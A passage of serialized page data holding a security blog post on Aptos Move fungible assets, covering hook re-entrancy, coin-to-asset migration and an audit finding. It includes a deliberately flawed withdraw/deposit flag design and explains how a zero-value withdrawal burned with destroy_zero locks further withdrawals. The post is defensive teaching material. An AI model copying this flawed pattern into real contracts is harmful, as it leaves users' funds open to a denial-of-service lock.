fa",{"type":24,"tag":301,"props":72797,"children":72798},{"style":385},[72799],{"type":30,"value":1679},{"type":24,"tag":301,"props":72801,"children":72802},{"style":10246},[72803],{"type":30,"value":68253},{"type":24,"tag":301,"props":72805,"children":72806},{"style":359},[72807],{"type":30,"value":1729},{"type":24,"tag":301,"props":72809,"children":72810},{"class":303,"line":592},[72811,72815,72819,72823,72827],{"type":24,"tag":301,"props":72812,"children":72813},{"style":369},[72814],{"type":30,"value":72621},{"type":24,"tag":301,"props":72816,"children":72817},{"style":385},[72818],{"type":30,"value":1679},{"type":24,"tag":301,"props":72820,"children":72821},{"style":385},[72822],{"type":30,"value":991},{"type":24,"tag":301,"props":72824,"children":72825},{"style":10246},[72826],{"type":30,"value":72136},{"type":24,"tag":301,"props":72828,"children":72829},{"style":359},[72830],{"type":30,"value":1729},{"type":24,"tag":301,"props":72832,"children":72833},{"class":303,"line":619},[72834],{"type":24,"tag":301,"props":72835,"children":72836},{"style":359},[72837],{"type":30,"value":398},{"type":24,"tag":301,"props":72839,"children":72840},{"class":303,"line":635},[72841],{"type":24,"tag":301,"props":72842,"children":72843},{"style":1062},[72844],{"type":30,"value":72664},{"type":24,"tag":301,"props":72846,"children":72847},{"class":303,"line":643},[72848,72852,72856,72861,72865,72869,72873,72877,72881,72885],{"type":24,"tag":301,"props":72849,"children":72850},{"style":359},[72851],{"type":30,"value":72672},{"type":24,"tag":301,"props":72853,"children":72854},{"style":385},[72855],{"type":30,"value":10308},{"type":24,"tag":301,"props":72857,"children":72858},{"style":314},[72859],{"type":30,"value":72860},"deposit_with_ref",{"type":24,"tag":301,"props":72862,"children":72863},{"style":359},[72864],{"type":30,"value":362},{"type":24,"tag":301,"props":72866,"children":72867},{"style":369},[72868],{"type":30,"value":72690},{"type":24,"tag":301,"props":72870,"children":72871},{"style":359},[72872],{"type":30,"value":377},{"type":24,"tag":301,"props":72874,"children":72875},{"style":369},[72876],{"type":30,"value":12760},{"type":24,"tag":301,"props":72878,"children":72879},{"style":359},[72880],{"type":30,"value":377},{"type":24,"tag":301,"props":72882,"children":72883},{"style":369},[72884],{"type":30,"value":68446},{"type":24,"tag":301,"props":72886,"children":72887},{"style":359},[72888],{"type":30,"value":589},{"type":24,"tag":301,"props":72890,"children":72891},{"class":303,"line":652},[72892],{"type":24,"tag":301,"props":72893,"children":72894},{"style":359},[72895],{"type":30,"value":698},{"type":24,"tag":72897,"props":72898,"children":72899},"question",{},[72900,72927],{"type":24,"tag":32,"props":72901,"children":72902},{},[72903,72905,72911,72913,72919,72920,72926],{"type":30,"value":72904},"Why hook functions rely on ",{"type":24,"tag":145,"props":72906,"children":72908},{"className":72907},[],[72909],{"type":30,"value":72910},"*_with_ref",{"type":30,"value":72912}," calls? What would happen if the hook function called ",{"type":24,"tag":145,"props":72914,"children":72916},{"className":72915},[],[72917],{"type":30,"value":72918},"dispatchable_fungible_asset::withdraw",{"type":30,"value":23574},{"type":24,"tag":145,"props":72921,"children":72923},{"className":72922},[],[72924],{"type":30,"value":72925},"fungible_asset::withdraw_with_ref",{"type":30,"value":2003},{"type":24,"tag":72928,"props":72929,"children":72930},"template",{"v-slot:answer-0":7},[72931,72943],{"type":24,"tag":32,"props":72932,"children":72933},{},[72934,72936,72941],{"type":30,"value":72935},"A1: Hook functions rely on ",{"type":24,"tag":145,"props":72937,"children":72939},{"className":72938},[],[72940],{"type":30,"value":72910},{"type":30,"value":72942}," calls because the default fungible asset functions verify if the fungible asset is not dispatchable.",{"type":24,"tag":32,"props":72944,"children":72945},{},[72946,72948,72953],{"type":30,"value":72947},"A2: A ",{"type":24,"tag":145,"props":72949,"children":72951},{"className":72950},[],[72952],{"type":30,"value":72918},{"type":30,"value":72954}," would result in RUNTIME_DISPATCH_ERROR (code 4037) error with error message: \"Re-entrancy detected\".",{"type":24,"tag":32,"props":72956,"children":72957},{},[72958],{"type":30,"value":72959},"In one of our reviews, we encountered a dispatchable fungible asset where the hooked withdrawal set a \"blocked\" flag, which was cleared by the corresponding deposit. This design was used to ensure that each withdrawal was tied to a deposit, effectively preventing simultaneous withdrawals.",{"type":24,"tag":291,"props":72961,"children":72963},{"className":9818,"code":72962,"language":9817,"meta":7,"style":7},"public fun deposit\u003CT: key>(store: Object\u003CT>, fa: FungibleAsset, transfer_ref: &TransferRef) {\n assert_withdraw_flag(true);\n [...]\n set_withdraw_flag(false);\n fungible_asset::deposit_with_ref(transfer_ref, store, amount);\n [...]\n }\n\npublic fun withdraw\u003CT: key>(store: Object\u003CT>, amount: u64, transfer_ref: &TransferRef): FungibleAsset acquires [...] {\n assert_withdraw_flag(false);\n [...]\n set_withdraw_flag(true);\n fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n",[72964],{"type":24,"tag":145,"props":72965,"children":72966},{"__ignoreMap":7},[72967,73062,73082,73097,73117,73160,73175,73182,73189,73308,73327,73342,73361,73404],{"type":24,"tag":301,"props":72968,"children":72969},{"class":303,"line":304},[72970,72974,72978,72982,72986,72990,72994,72998,73002,73006,73010,73014,73018,73022,73026,73030,73034,73038,73042,73046,73050,73054,73058],{"type":24,"tag":301,"props":72971,"children":72972},{"style":369},[72973],{"type":30,"value":68388},{"type":24,"tag":301,"props":72975,"children":72976},{"style":369},[72977],{"type":30,"value":13026},{"type":24,"tag":301,"props":72979,"children":72980},{"style":369},[72981],{"type":30,"value":68397},{"type":24,"tag":301,"props":72983,"children":72984},{"style":359},[72985],{"type":30,"value":1849},{"type":24,"tag":301,"props":72987,"children":72988},{"style":10246},[72989],{"type":30,"value":12807},{"type":24,"tag":301,"props":72991,"children":72992},{"style":385},[72993],{"type":30,"value":1679},{"type":24,"tag":301,"props":72995,"children":72996},{"style":369},[72997],{"type":30,"value":12751},{"type":24,"tag":301,"props":72999,"children":73000},{"style":359},[73001],{"type":30,"value":14426},{"type":24,"tag":301,"props":73003,"children":73004},{"style":369},[73005],{"type":30,"value":12760},{"type":24,"tag":301,"props":73007,"children":73008},{"style":385},[73009],{"type":30,"value":1679},{"type":24,"tag":301,"props":73011,"children":73012},{"style":10246},[73013],{"type":30,"value":68274},{"type":24,"tag":301,"props":73015,"children":73016},{"style":359},[73017],{"type":30,"value":1849},{"type":24,"tag":301,"props":73019,"children":73020},{"style":10246},[73021],{"type":30,"value":12807},{"type":24,"tag":301,"props":73023,"children":73024},{"style":359},[73025],{"type":30,"value":13449},{"type":24,"tag":301,"props":73027,"children":73028},{"style":369},[73029],{"type":30,"value":68446},{"type":24,"tag":301,"props":73031,"children":73032},{"style":385},[73033],{"type":30,"value":1679},{"type":24,"tag":301,"props":73035,"children":73036},{"style":10246},[73037],{"type":30,"value":68253},{"type":24,"tag":301,"props":73039,"children":73040},{"style":359},[73041],{"type":30,"value":377},{"type":24,"tag":301,"props":73043,"children":73044},{"style":369},[73045],{"type":30,"value":72690},{"type":24,"tag":301,"props":73047,"children":73048},{"style":385},[73049],{"type":30,"value":1679},{"type":24,"tag":301,"props":73051,"children":73052},{"style":385},[73053],{"type":30,"value":991},{"type":24,"tag":301,"props":73055,"children":73056},{"style":10246},[73057],{"type":30,"value":72136},{"type":24,"tag":301,"props":73059,"children":73060},{"style":359},[73061],{"type":30,"value":398},{"type":24,"tag":301,"props":73063,"children":73064},{"class":303,"line":320},[73065,73070,73074,73078],{"type":24,"tag":301,"props":73066,"children":73067},{"style":314},[73068],{"type":30,"value":73069}," assert_withdraw_flag",{"type":24,"tag":301,"props":73071,"children":73072},{"style":359},[73073],{"type":30,"value":362},{"type":24,"tag":301,"props":73075,"children":73076},{"style":348},[73077],{"type":30,"value":10819},{"type":24,"tag":301,"props":73079,"children":73080},{"style":359},[73081],{"type":30,"value":589},{"type":24,"tag":301,"props":73083,"children":73084},{"class":303,"line":335},[73085,73089,73093],{"type":24,"tag":301,"props":73086,"children":73087},{"style":359},[73088],{"type":30,"value":69430},{"type":24,"tag":301,"props":73090,"children":73091},{"style":385},[73092],{"type":30,"value":4054},{"type":24,"tag":301,"props":73094,"children":73095},{"style":359},[73096],{"type":30,"value":4059},{"type":24,"tag":301,"props":73098,"children":73099},{"class":303,"line":344},[73100,73105,73109,73113],{"type":24,"tag":301,"props":73101,"children":73102},{"style":314},[73103],{"type":30,"value":73104}," set_withdraw_flag",{"type":24,"tag":301,"props":73106,"children":73107},{"style":359},[73108],{"type":30,"value":362},{"type":24,"tag":301,"props":73110,"children":73111},{"style":348},[73112],{"type":30,"value":14990},{"type":24,"tag":301,"props":73114,"children":73115},{"style":359},[73116],{"type":30,"value":589},{"type":24,"tag":301,"props":73118,"children":73119},{"class":303,"line":401},[73120,73124,73128,73132,73136,73140,73144,73148,73152,73156],{"type":24,"tag":301,"props":73121,"children":73122},{"style":359},[73123],{"type":30,"value":72672},{"type":24,"tag":301,"props":73125,"children":73126},{"style":385},[73127],{"type":30,"value":10308},{"type":24,"tag":301,"props":73129,"children":73130},{"style":314},[73131],{"type":30,"value":72860},{"type":24,"tag":301,"props":73133,"children":73134},{"style":359},[73135],{"type":30,"value":362},{"type":24,"tag":301,"props":73137,"children":73138},{"style":369},[73139],{"type":30,"value":72690},{"type":24,"tag":301,"props":73141,"children":73142},{"style":359},[73143],{"type":30,"value":377},{"type":24,"tag":301,"props":73145,"children":73146},{"style":369},[73147],{"type":30,"value":12760},{"type":24,"tag":301,"props":73149,"children":73150},{"style":359},[73151],{"type":30,"value":377},{"type":24,"tag":301,"props":73153,"children":73154},{"style":369},[73155],{"type":30,"value":27077},{"type":24,"tag":301,"props":73157,"children":73158},{"style":359},[73159],{"type":30,"value":589},{"type":24,"tag":301,"props":73161,"children":73162},{"class":303,"line":415},[73163,73167,73171],{"type":24,"tag":301,"props":73164,"children":73165},{"style":359},[73166],{"type":30,"value":69430},{"type":24,"tag":301,"props":73168,"children":73169},{"style":385},[73170],{"type":30,"value":4054},{"type":24,"tag":301,"props":73172,"children":73173},{"style":359},[73174],{"type":30,"value":4059},{"type":24,"tag":301,"props":73176,"children":73177},{"class":303,"line":439},[73178],{"type":24,"tag":301,"props":73179,"children":73180},{"style":359},[73181],{"type":30,"value":501},{"type":24,"tag":301,"props":73183,"children":73184},{"class":303,"line":447},[73185],{"type":24,"tag":301,"props":73186,"children":73187},{"emptyLinePlaceholder":16},[73188],{"type":30,"value":341},{"type":24,"tag":301,"props":73190,"children":73191},{"class":303,"line":476},[73192,73196,73200,73204,73208,73212,73216,73220,73224,73228,73232,73236,73240,73244,73248,73252,73256,73260,73264,73268,73272,73276,73280,73284,73288,73292,73296,73300,73304],{"type":24,"tag":301,"props":73193,"children":73194},{"style":369},[73195],{"type":30,"value":68388},{"type":24,"tag":301,"props":73197,"children":73198},{"style":369},[73199],{"type":30,"value":13026},{"type":24,"tag":301,"props":73201,"children":73202},{"style":369},[73203],{"type":30,"value":27042},{"type":24,"tag":301,"props":73205,"children":73206},{"style":359},[73207],{"type":30,"value":1849},{"type":24,"tag":301,"props":73209,"children":73210},{"style":10246},[73211],{"type":30,"value":12807},{"type":24,"tag":301,"props":73213,"children":73214},{"style":385},[73215],{"type":30,"value":1679},{"type":24,"tag":301,"props":73217,"children":73218},{"style":369},[73219],{"type":30,"value":12751},{"type":24,"tag":301,"props":73221,"children":73222},{"style":359},[73223],{"type":30,"value":14426},{"type":24,"tag":301,"props":73225,"children":73226},{"style":369},[73227],{"type":30,"value":12760},{"type":24,"tag":301,"props":73229,"children":73230},{"style":385},[73231],{"type":30,"value":1679},{"type":24,"tag":301,"props":73233,"children":73234},{"style":10246},[73235],{"type":30,"value":68274},{"type":24,"tag":301,"props":73237,"children":73238},{"style":359},[73239],{"type":30,"value":1849},{"type":24,"tag":301,"props":73241,"children":73242},{"style":10246},[73243],{"type":30,"value":12807},{"type":24,"tag":301,"props":73245,"children":73246},{"style":359},[73247],{"type":30,"value":13449},{"type":24,"tag":301,"props":73249,"children":73250},{"style":369},[73251],{"type":30,"value":27077},{"type":24,"tag":301,"props":73253,"children":73254},{"style":385},[73255],{"type":30,"value":1679},{"type":24,"tag":301,"props":73257,"children":73258},{"style":10246},[73259],{"type":30,"value":12680},{"type":24,"tag":301,"props":73261,"children":73262},{"style":359},[73263],{"type":30,"value":377},{"type":24,"tag":301,"props":73265,"children":73266},{"style":369},[73267],{"type":30,"value":72690},{"type":24,"tag":301,"props":73269,"children":73270},{"style":385},[73271],{"type":30,"value":1679},{"type":24,"tag":301,"props":73273,"children":73274},{"style":385},[73275],{"type":30,"value":991},{"type":24,"tag":301,"props":73277,"children":73278},{"style":10246},[73279],{"type":30,"value":72136},{"type":24,"tag":301,"props":73281,"children":73282},{"style":359},[73283],{"type":30,"value":9961},{"type":24,"tag":301,"props":73285,"children":73286},{"style":385},[73287],{"type":30,"value":1679},{"type":24,"tag":301,"props":73289,"children":73290},{"style":10246},[73291],{"type":30,"value":68253},{"type":24,"tag":301,"props":73293,"children":73294},{"style":369},[73295],{"type":30,"value":14382},{"type":24,"tag":301,"props":73297,"children":73298},{"style":359},[73299],{"type":30,"value":29800},{"type":24,"tag":301,"props":73301,"children":73302},{"style":385},[73303],{"type":30,"value":4054},{"type":24,"tag":301,"props":73305,"children":73306},{"style":359},[73307],{"type":30,"value":68479},{"type":24,"tag":301,"props":73309,"children":73310},{"class":303,"line":495},[73311,73315,73319,73323],{"type":24,"tag":301,"props":73312,"children":73313},{"style":314},[73314],{"type":30,"value":73069},{"type":24,"tag":301,"props":73316,"children":73317},{"style":359},[73318],{"type":30,"value":362},{"type":24,"tag":301,"props":73320,"children":73321},{"style":348},[73322],{"type":30,"value":14990},{"type":24,"tag":301,"props":73324,"children":73325},{"style":359},[73326],{"type":30,"value":589},{"type":24,"tag":301,"props":73328,"children":73329},{"class":303,"line":504},[73330,73334,73338],{"type":24,"tag":301,"props":73331,"children":73332},{"style":359},[73333],{"type":30,"value":69430},{"type":24,"tag":301,"props":73335,"children":73336},{"style":385},[73337],{"type":30,"value":4054},{"type":24,"tag":301,"props":73339,"children":73340},{"style":359},[73341],{"type":30,"value":4059},{"type":24,"tag":301,"props":73343,"children":73344},{"class":303,"line":512},[73345,73349,73353,73357],{"type":24,"tag":301,"props":73346,"children":73347},{"style":314},[73348],{"type":30,"value":73104},{"type":24,"tag":301,"props":73350,"children":73351},{"style":359},[73352],{"type":30,"value":362},{"type":24,"tag":301,"props":73354,"children":73355},{"style":348},[73356],{"type":30,"value":10819},{"type":24,"tag":301,"props":73358,"children":73359},{"style":359},[73360],{"type":30,"value":589},{"type":24,"tag":301,"props":73362,"children":73363},{"class":303,"line":592},[73364,73368,73372,73376,73380,73384,73388,73392,73396,73400],{"type":24,"tag":301,"props":73365,"children":73366},{"style":359},[73367],{"type":30,"value":72672},{"type":24,"tag":301,"props":73369,"children":73370},{"style":385},[73371],{"type":30,"value":10308},{"type":24,"tag":301,"props":73373,"children":73374},{"style":314},[73375],{"type":30,"value":72681},{"type":24,"tag":301,"props":73377,"children":73378},{"style":359},[73379],{"type":30,"value":362},{"type":24,"tag":301,"props":73381,"children":73382},{"style":369},[73383],{"type":30,"value":72690},{"type":24,"tag":301,"props":73385,"children":73386},{"style":359},[73387],{"type":30,"value":377},{"type":24,"tag":301,"props":73389,"children":73390},{"style":369},[73391],{"type":30,"value":12760},{"type":24,"tag":301,"props":73393,"children":73394},{"style":359},[73395],{"type":30,"value":377},{"type":24,"tag":301,"props":73397,"children":73398},{"style":369},[73399],{"type":30,"value":27077},{"type":24,"tag":301,"props":73401,"children":73402},{"style":359},[73403],{"type":30,"value":791},{"type":24,"tag":301,"props":73405,"children":73406},{"class":303,"line":619},[73407],{"type":24,"tag":301,"props":73408,"children":73409},{"style":359},[73410],{"type":30,"value":698},{"type":24,"tag":32,"props":73412,"children":73413},{},[73414],{"type":30,"value":73415},"At first glance, this code appears valid, but not to an astute reader.",{"type":24,"tag":72897,"props":73417,"children":73418},{},[73419,73424],{"type":24,"tag":32,"props":73420,"children":73421},{},[73422],{"type":30,"value":73423},"Can you spot the bug? Hint: We mentioned the root cause previously.",{"type":24,"tag":72928,"props":73425,"children":73426},{"v-slot:answer-0":7},[73427,73447],{"type":24,"tag":32,"props":73428,"children":73429},{},[73430,73432,73437,73439,73445],{"type":30,"value":73431},"The developer overlooked an important detail, which we already mentioned earlier: a fungible asset with a value of zero can also be burned! An attacker could exploit this by withdrawing 0 ",{"type":24,"tag":145,"props":73433,"children":73435},{"className":73434},[],[73436],{"type":30,"value":68224},{"type":30,"value":73438}," (since withdraw doesn’t verify if the value is greater than 0) and then burning it using ",{"type":24,"tag":145,"props":73440,"children":73442},{"className":73441},[],[73443],{"type":30,"value":73444},"fungible_asset::destroy_zero",{"type":30,"value":73446},". This would complete the transaction while keeping the \"blocked\" flag set, effectively preventing further withdrawals.",{"type":24,"tag":32,"props":73448,"children":73449},{},[73450],{"type":30,"value":73451},"It's important to understand all the features in the standard.",{"type":24,"tag":43,"props":73453,"children":73455},{"id":73454},"migrating-from-coins-to-fungible-assets",[73456],{"type":30,"value":73457},"Migrating from coins to fungible assets",{"type":24,"tag":32,"props":73459,"children":73460},{},[73461,73463,73468],{"type":30,"value":73462},"If a fungible asset is considered an upgrade to ",{"type":24,"tag":145,"props":73464,"children":73466},{"className":73465},[],[73467],{"type":30,"value":67679},{"type":30,"value":73469},", a transition mechanism becomes necessary. This is addressed through a conversion map, establishing a relationship between specific coin and fungible asset. This duality is not without its challenges.",{"type":24,"tag":73471,"props":73472,"children":73473},"note",{},[73474],{"type":24,"tag":32,"props":73475,"children":73476},{},[73477,73479,73484,73486,73491],{"type":30,"value":73478},"While the ",{"type":24,"tag":145,"props":73480,"children":73482},{"className":73481},[],[73483],{"type":30,"value":67679},{"type":30,"value":73485}," API recognizes and integrates with fungible assets, the fungible asset APIs do not have awareness of the linked ",{"type":24,"tag":145,"props":73487,"children":73489},{"className":73488},[],[73490],{"type":30,"value":67679},{"type":30,"value":206},{"type":24,"tag":32,"props":73493,"children":73494},{},[73495,73496,73502,73504,73509,73511,73516],{"type":30,"value":8079},{"type":24,"tag":145,"props":73497,"children":73499},{"className":73498},[],[73500],{"type":30,"value":73501},"coin_to_fungible_asset",{"type":30,"value":73503}," converting function automatically generates a corresponding fungible asset for a ",{"type":24,"tag":145,"props":73505,"children":73507},{"className":73506},[],[73508],{"type":30,"value":67679},{"type":30,"value":73510}," if one does not already exist. Manual creation of a fungible asset and its linkage to a ",{"type":24,"tag":145,"props":73512,"children":73514},{"className":73513},[],[73515],{"type":30,"value":67679},{"type":30,"value":73517}," is not allowed.",{"type":24,"tag":291,"props":73519,"children":73521},{"className":9818,"code":73520,"language":9817,"meta":7,"style":7},"public fun coin_to_fungible_asset\u003CCoinType>(\n coin: Coin\u003CCoinType>\n): FungibleAsset acquires CoinConversionMap, CoinInfo {\n let metadata = ensure_paired_metadata\u003CCoinType>();\n let amount = burn_internal(coin);\n fungible_asset::mint_internal(metadata, amount)\n}\n",[73522],{"type":24,"tag":145,"props":73523,"children":73524},{"__ignoreMap":7},[73525,73553,73580,73616,73649,73682,73718],{"type":24,"tag":301,"props":73526,"children":73527},{"class":303,"line":304},[73528,73532,73536,73541,73545,73549],{"type":24,"tag":301,"props":73529,"children":73530},{"style":369},[73531],{"type":30,"value":68388},{"type":24,"tag":301,"props":73533,"children":73534},{"style":369},[73535],{"type":30,"value":13026},{"type":24,"tag":301,"props":73537,"children":73538},{"style":369},[73539],{"type":30,"value":73540}," coin_to_fungible_asset",{"type":24,"tag":301,"props":73542,"children":73543},{"style":359},[73544],{"type":30,"value":1849},{"type":24,"tag":301,"props":73546,"children":73547},{"style":10246},[73548],{"type":30,"value":13402},{"type":24,"tag":301,"props":73550,"children":73551},{"style":359},[73552],{"type":30,"value":13407},{"type":24,"tag":301,"props":73554,"children":73555},{"class":303,"line":320},[73556,73560,73564,73568,73572,73576],{"type":24,"tag":301,"props":73557,"children":73558},{"style":369},[73559],{"type":30,"value":67898},{"type":24,"tag":301,"props":73561,"children":73562},{"style":385},[73563],{"type":30,"value":1679},{"type":24,"tag":301,"props":73565,"children":73566},{"style":10246},[73567],{"type":30,"value":12622},{"type":24,"tag":301,"props":73569,"children":73570},{"style":359},[73571],{"type":30,"value":1849},{"type":24,"tag":301,"props":73573,"children":73574},{"style":10246},[73575],{"type":30,"value":13402},{"type":24,"tag":301,"props":73577,"children":73578},{"style":359},[73579],{"type":30,"value":12812},{"type":24,"tag":301,"props":73581,"children":73582},{"class":303,"line":335},[73583,73587,73591,73595,73599,73604,73608,73612],{"type":24,"tag":301,"props":73584,"children":73585},{"style":359},[73586],{"type":30,"value":9961},{"type":24,"tag":301,"props":73588,"children":73589},{"style":385},[73590],{"type":30,"value":1679},{"type":24,"tag":301,"props":73592,"children":73593},{"style":10246},[73594],{"type":30,"value":68253},{"type":24,"tag":301,"props":73596,"children":73597},{"style":369},[73598],{"type":30,"value":14382},{"type":24,"tag":301,"props":73600,"children":73601},{"style":10246},[73602],{"type":30,"value":73603}," CoinConversionMap",{"type":24,"tag":301,"props":73605,"children":73606},{"style":359},[73607],{"type":30,"value":377},{"type":24,"tag":301,"props":73609,"children":73610},{"style":10246},[73611],{"type":30,"value":13532},{"type":24,"tag":301,"props":73613,"children":73614},{"style":359},[73615],{"type":30,"value":3035},{"type":24,"tag":301,"props":73617,"children":73618},{"class":303,"line":344},[73619,73623,73628,73632,73637,73641,73645],{"type":24,"tag":301,"props":73620,"children":73621},{"style":348},[73622],{"type":30,"value":9838},{"type":24,"tag":301,"props":73624,"children":73625},{"style":369},[73626],{"type":30,"value":73627}," metadata",{"type":24,"tag":301,"props":73629,"children":73630},{"style":385},[73631],{"type":30,"value":2537},{"type":24,"tag":301,"props":73633,"children":73634},{"style":369},[73635],{"type":30,"value":73636}," ensure_paired_metadata",{"type":24,"tag":301,"props":73638,"children":73639},{"style":359},[73640],{"type":30,"value":1849},{"type":24,"tag":301,"props":73642,"children":73643},{"style":10246},[73644],{"type":30,"value":13402},{"type":24,"tag":301,"props":73646,"children":73647},{"style":359},[73648],{"type":30,"value":15266},{"type":24,"tag":301,"props":73650,"children":73651},{"class":303,"line":401},[73652,73656,73661,73665,73670,73674,73678],{"type":24,"tag":301,"props":73653,"children":73654},{"style":348},[73655],{"type":30,"value":9838},{"type":24,"tag":301,"props":73657,"children":73658},{"style":369},[73659],{"type":30,"value":73660}," amount",{"type":24,"tag":301,"props":73662,"children":73663},{"style":385},[73664],{"type":30,"value":2537},{"type":24,"tag":301,"props":73666,"children":73667},{"style":314},[73668],{"type":30,"value":73669}," burn_internal",{"type":24,"tag":301,"props":73671,"children":73672},{"style":359},[73673],{"type":30,"value":362},{"type":24,"tag":301,"props":73675,"children":73676},{"style":369},[73677],{"type":30,"value":67646},{"type":24,"tag":301,"props":73679,"children":73680},{"style":359},[73681],{"type":30,"value":589},{"type":24,"tag":301,"props":73683,"children":73684},{"class":303,"line":415},[73685,73689,73693,73698,73702,73706,73710,73714],{"type":24,"tag":301,"props":73686,"children":73687},{"style":359},[73688],{"type":30,"value":72672},{"type":24,"tag":301,"props":73690,"children":73691},{"style":385},[73692],{"type":30,"value":10308},{"type":24,"tag":301,"props":73694,"children":73695},{"style":314},[73696],{"type":30,"value":73697},"mint_internal",{"type":24,"tag":301,"props":73699,"children":73700},{"style":359},[73701],{"type":30,"value":362},{"type":24,"tag":301,"props":73703,"children":73704},{"style":369},[73705],{"type":30,"value":69024},{"type":24,"tag":301,"props":73707,"children":73708},{"style":359},[73709],{"type":30,"value":377},{"type":24,"tag":301,"props":73711,"children":73712},{"style":369},[73713],{"type":30,"value":27077},{"type":24,"tag":301,"props":73715,"children":73716},{"style":359},[73717],{"type":30,"value":791},{"type":24,"tag":301,"props":73719,"children":73720},{"class":303,"line":439},[73721],{"type":24,"tag":301,"props":73722,"children":73723},{"style":359},[73724],{"type":30,"value":698},{"type":24,"tag":32,"props":73726,"children":73727},{},[73728,73730,73737],{"type":30,"value":73729},"When creating a fungible asset, several pieces of information are required, such as the asset’s name, symbol, or maximum supply. During our audit of the fungible asset standard, we ",{"type":24,"tag":188,"props":73731,"children":73734},{"href":73732,"rel":73733},"https://github.com/aptos-labs/aptos-core/commit/e5f4b62b237dad4d15069d3bb0b551b2df04bf08",[192],[73735],{"type":30,"value":73736},"noticed an overlooked detail",{"type":30,"value":73738}," in the linking process.",{"type":24,"tag":291,"props":73740,"children":73742},{"className":9818,"code":73741,"language":9817,"meta":7,"style":7},"[...]\nprimary_fungible_store::create_primary_store_enabled_fungible_asset(\n &metadata_object_cref,\n option::map(coin_supply\u003CCoinType>(), |_| MAX_U128),\n name\u003CCoinType>(),\n symbol\u003CCoinType>(),\n decimals\u003CCoinType>(),\n string::utf8(b\"\"),\n string::utf8(b\"\"),\n);\n[...]\n",[73743],{"type":24,"tag":145,"props":73744,"children":73745},{"__ignoreMap":7},[73746,73761,73781,73798,73854,73875,73895,73915,73945,73972,73979],{"type":24,"tag":301,"props":73747,"children":73748},{"class":303,"line":304},[73749,73753,73757],{"type":24,"tag":301,"props":73750,"children":73751},{"style":359},[73752],{"type":30,"value":541},{"type":24,"tag":301,"props":73754,"children":73755},{"style":385},[73756],{"type":30,"value":4054},{"type":24,"tag":301,"props":73758,"children":73759},{"style":359},[73760],{"type":30,"value":4059},{"type":24,"tag":301,"props":73762,"children":73763},{"class":303,"line":320},[73764,73768,73772,73777],{"type":24,"tag":301,"props":73765,"children":73766},{"style":359},[73767],{"type":30,"value":69321},{"type":24,"tag":301,"props":73769,"children":73770},{"style":385},[73771],{"type":30,"value":10308},{"type":24,"tag":301,"props":73773,"children":73774},{"style":314},[73775],{"type":30,"value":73776},"create_primary_store_enabled_fungible_asset",{"type":24,"tag":301,"props":73778,"children":73779},{"style":359},[73780],{"type":30,"value":1707},{"type":24,"tag":301,"props":73782,"children":73783},{"class":303,"line":335},[73784,73789,73794],{"type":24,"tag":301,"props":73785,"children":73786},{"style":385},[73787],{"type":30,"value":73788}," &",{"type":24,"tag":301,"props":73790,"children":73791},{"style":369},[73792],{"type":30,"value":73793},"metadata_object_cref",{"type":24,"tag":301,"props":73795,"children":73796},{"style":359},[73797],{"type":30,"value":1729},{"type":24,"tag":301,"props":73799,"children":73800},{"class":303,"line":344},[73801,73806,73810,73815,73819,73824,73828,73832,73837,73841,73845,73849],{"type":24,"tag":301,"props":73802,"children":73803},{"style":359},[73804],{"type":30,"value":73805}," option",{"type":24,"tag":301,"props":73807,"children":73808},{"style":385},[73809],{"type":30,"value":10308},{"type":24,"tag":301,"props":73811,"children":73812},{"style":314},[73813],{"type":30,"value":73814},"map",{"type":24,"tag":301,"props":73816,"children":73817},{"style":359},[73818],{"type":30,"value":362},{"type":24,"tag":301,"props":73820,"children":73821},{"style":369},[73822],{"type":30,"value":73823},"coin_supply",{"type":24,"tag":301,"props":73825,"children":73826},{"style":359},[73827],{"type":30,"value":1849},{"type":24,"tag":301,"props":73829,"children":73830},{"style":10246},[73831],{"type":30,"value":13402},{"type":24,"tag":301,"props":73833,"children":73834},{"style":359},[73835],{"type":30,"value":73836},">(), ",{"type":24,"tag":301,"props":73838,"children":73839},{"style":385},[73840],{"type":30,"value":17220},{"type":24,"tag":301,"props":73842,"children":73843},{"style":369},[73844],{"type":30,"value":9918},{"type":24,"tag":301,"props":73846,"children":73847},{"style":385},[73848],{"type":30,"value":17220},{"type":24,"tag":301,"props":73850,"children":73851},{"style":359},[73852],{"type":30,"value":73853}," MAX_U128),\n",{"type":24,"tag":301,"props":73855,"children":73856},{"class":303,"line":401},[73857,73862,73866,73870],{"type":24,"tag":301,"props":73858,"children":73859},{"style":369},[73860],{"type":30,"value":73861}," name",{"type":24,"tag":301,"props":73863,"children":73864},{"style":359},[73865],{"type":30,"value":1849},{"type":24,"tag":301,"props":73867,"children":73868},{"style":10246},[73869],{"type":30,"value":13402},{"type":24,"tag":301,"props":73871,"children":73872},{"style":359},[73873],{"type":30,"value":73874},">(),\n",{"type":24,"tag":301,"props":73876,"children":73877},{"class":303,"line":415},[73878,73883,73887,73891],{"type":24,"tag":301,"props":73879,"children":73880},{"style":369},[73881],{"type":30,"value":73882}," symbol",{"type":24,"tag":301,"props":73884,"children":73885},{"style":359},[73886],{"type":30,"value":1849},{"type":24,"tag":301,"props":73888,"children":73889},{"style":10246},[73890],{"type":30,"value":13402},{"type":24,"tag":301,"props":73892,"children":73893},{"style":359},[73894],{"type":30,"value":73874},{"type":24,"tag":301,"props":73896,"children":73897},{"class":303,"line":439},[73898,73903,73907,73911],{"type":24,"tag":301,"props":73899,"children":73900},{"style":369},[73901],{"type":30,"value":73902}," decimals",{"type":24,"tag":301,"props":73904,"children":73905},{"style":359},[73906],{"type":30,"value":1849},{"type":24,"tag":301,"props":73908,"children":73909},{"style":10246},[73910],{"type":30,"value":13402},{"type":24,"tag":301,"props":73912,"children":73913},{"style":359},[73914],{"type":30,"value":73874},{"type":24,"tag":301,"props":73916,"children":73917},{"class":303,"line":447},[73918,73923,73927,73932,73936,73941],{"type":24,"tag":301,"props":73919,"children":73920},{"style":359},[73921],{"type":30,"value":73922}," 